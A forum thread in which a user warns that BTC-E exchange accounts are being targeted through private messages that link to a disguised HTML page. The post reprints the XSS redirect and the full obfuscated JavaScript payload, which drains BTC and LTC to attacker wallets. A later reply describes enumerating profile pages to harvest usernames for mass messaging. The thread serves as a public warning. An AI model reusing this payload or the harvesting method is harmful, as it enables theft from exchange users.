Attention - Someone is stealing BTC & LTC at BTC-E

[nsieugesug]

Hello,

today I got a private message at BTC-E. This is the first strange thing since I didn't ever use the trollbox or used the PM system there.

It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file.

        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
        <head>
        </head>
        <body>
        <script language="JavaScript">
        document.location="https://btc-e.com/news/32?page=1<script+src=http://fast-image.com/q.js><\/script>";
        </script>
        </body>
        </html>

This downloads a script which seems to exploit an XSS vulnerability on BTC-E.

eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \"http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);"))

According to Blockexplorer, significant amounts of BTC were already stolen:

http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo

[nsieugesug]

(could an admin/moderator move this to the proper section please?)

[maurits150]

I'm also interested how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.

[dudeofthestick]

What operating system and browser version are you using? With versions, please.

[Becher-Karl]

In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

[nsieugesug]

What operating system and browser version are you using? With versions, please.

Browser? I prefer to use wget on a seperate Linux box when someone wants me to click strange links...  

[nsieugesug]

In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

Trollbox is enabled in my account, but I never posted something there. However, I'm not 100% sure. Could have typed some bullshit there by accident.

[optimator]

In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess

[nsieugesug]

Looks like they have removed the attack scripts from the server. No problem, you have a copy here now. 

[bzh]

In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess

I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.

[samten]

don't trust strangers

[optimator]

I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I Still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.

Bummer! That does lead one to the conclusion that there was inside help....

[moni3z]

You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs.

https://btc-e.com/profile/1000
https://btc-e.com/profile/10000
https://btc-e.com/profile/80001

[nsieugesug]

You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs.

You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.

[nsieugesug]

Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)?

I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.